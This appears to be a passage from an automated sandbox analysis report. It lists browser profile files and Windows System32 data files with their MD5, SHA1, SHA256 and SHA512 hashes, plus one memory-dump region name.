| SHA512 | c6f61800bb13b527c2bb4ceba085d4af44a6d304b7da640d39487556cb2aa059469a537815a8fd3c86382b253cae9bce528a80447aa278e5d1cfc7cb8c2b2fab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 39aa0563fdbb0284e43887d5c219bfbb |
| SHA1 | 7db94d24a5af2b255395ef450a584fde99dc6037 |
| SHA256 | 7257f5d263ff1a0d007ace4897b886cfc99799448bd1cb99fb881107b8c44c92 |
| SHA512 | 65ec34d800bf1874ee7187f741e284f3800269b07e9f42ab485736d64e837e1b2407199a85a29a632dd024c28d4dfd452cb7915f7594778e55d0b10f4ab111af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | db91d3888b93290a4e5a207b5f4bd7ce |
| SHA1 | 7b9ebc03dda9902ef4d8e90ee8657a4408eed893 |
| SHA256 | 8398ce5d691fa10fbfaf777f24d72d8b944a8f22166e929524bb9ca28201b213 |
| SHA512 | f6e0c7c649baa7ac69f54d7341bb2c6095c55e461138b29192b847a9a78b7fcd1c47c43dd8ab7dbeac6339eb62aa7b189133cf585742073a192db19210174dae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8a33caa5fa60541cff7ee0b997de23c4 |
| SHA1 | b63ca80cd7210dcb6ee423f16c2496fb55137be4 |
| SHA256 | 9bfaa47764089c1d36329735ba8e08f8996f90a9fea4d803f3dcdfea314a50ff |
| SHA512 | f705b40b84f55aaf90a3d43611c866714aed73a89639609120acd2e4618bf911e14a4ab271fea16b80a8210586ccc64e9675ba61717421e3ba6f62463b7bd781 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0687b5d89dc79ccb00159b338dc33549 |
| SHA1 | 99a6d12a4f339dc7439aa8140a8a0b0a4b26bae9 |
| SHA256 | bd3953c0399560ef333ff9dd36b8dca792ef2b7d1afa59a59f39b0506f4bf2a9 |
| SHA512 | 78c09e3f9712c941aa359f3e84889afcf7de6ed819d640006f49f9e94e1e2b562edeccb47b34fb4f6fda587e4636dcd1b4f6de3e47620f64c482ada6d0057e7a |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | aff1f8d423eea1ceb09dfcc08397676a |
| SHA1 | 4d170d6858792a13873be98334dec639a6dfc232 |
| SHA256 | 418d5803e63d54fb2bf4a3cc6db5628ad912259c032787b2bd3ff19c23b506c7 |
| SHA512 | bb5c5962976f8929e13ba97a23b5f68b39f8666d6c69aed153ed07c393825c18065df9df155aa9710a520816b2827735d47162ff8232289ddfa87fcf254ce54d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6e25871e8a4f9c38d217ef7745541d88 |
| SHA1 | 0dbc525b1ca79bb3c3756fbe18ac158922408cce |
| SHA256 | ca75c8d382ceb736603bbf2be779f03e4fa009240d84566a5a1e211e749f8b1b |
| SHA512 | f50ddcca807916bf1a2452375c23e6ac8e609fb887f66d36f428dbccbed0c1c20aa59576f9e20e58f61ca21d1d2531b074619be175d301303f17bafd93810254 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4b2175b18f44df5c07ff55b671960eca |
| SHA1 | e0a41ba78c8adbd754e56286370924a45be6e41c |
| SHA256 | accf0ba5aeb1c0d9a561e953fb7d0491adf44ef9f7c8ee964fe7f0d080c2f198 |
| SHA512 | 9b1d825a7e47bf1b37b0908a1c438050d2af1abb8d4e0074cd648f0f2e5d9cd7386c0a8f688029d6c9c18f481c10363de81ee2969a465cdd9149f33b2e646e95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 92d98b217ed7dd1bb497b8e78417b809 |
| SHA1 | 32524f744e22fbe7f33b176af9ecf0545a810c31 |
| SHA256 | 264be3333c22da99de2c2b6c992f29ec85e0eba486cb11723eaa568bb21ec7cc |
| SHA512 | 685a370a2ec027ced874147d52024dc338d192e69e04eab9908131ce77e995990999e530303ff8bf81509bed927fc57f243cbde465dbd1ba9e36dcb6916a4356 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 775cd0b7e74fcd4d16550f5a8fcff73a |
| SHA1 | 4276f6b8c616f200e8c0628829817f7801f46ed0 |
| SHA256 | 1f2e0108962ddb14c8ffb7bd3c483714a937bb6cbb0cc71de991a1638bd73582 |
| SHA512 | 5738e1a169d1f1f5669b0eeb8be7c2221ec2e56babef2ebf6b25b896167655eb4a6e0dcdbeb042ebb28c05b6fdc37c4706a08ea4a35e0d97b68118f3370393bf |
C:\Windows\System32\perfh009.dat
| MD5 | f192a9b0239e7d1d68f82eabd1583521 |
| SHA1 | fee3eba81cd25dea75d0e6636ad5e29f3a842a71 |
| SHA256 | ecb0d867b62ff62be4153970ffc4ed353493f8b5d003c8e2f716a0ac56ca0194 |
| SHA512 | ccd860f7d415e070d06e86d32ae1b315c47c4bb5677275e2d75092a796abc75e8bd37db90726a041d96da9fb843524c30d6ad765004baf54900ea4ea3c46d81e |
C:\Windows\System32\perfc009.dat
| MD5 | 31b0b43206c3924d306a6342c6b2f0d2 |
| SHA1 | a493e0a346c86ea02232f5849a00d1b1b8df14f4 |
| SHA256 | 8a820f95ee0f8ab0c116286d21087195b0eca2fcd89bc46e55342e99302e72dc |
| SHA512 | d63dd3092dd7a033ac3d3a44b3f736175f8b8b29c12a8e9a6f707d4a2178ba250a55cced5a53e32181c75811324e9c1f2bf03f75998b39da1d9199c3e1dda3ca |
memory/1604-4966-0x0000000072E40000-0x0000000072ECA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 9c818deafac3be2266e8435aac2e4a55 |
| SHA1 | bc60ea5cc16c36967f71b87a1973fca423c1faad |
| SHA256 | 2ce91548cd5a9d174c369c376c34e44b8ff8389701b5bc1c00df1b6935ab0154 |
| SHA512 | d8415a0b3cd276680c402628bda0e4a66e900847eebaea8158595d9daefc6224eb2ecfaf0ed81038117c88f1217c73e60bf88bb91936d95564dd478bff19d0ca |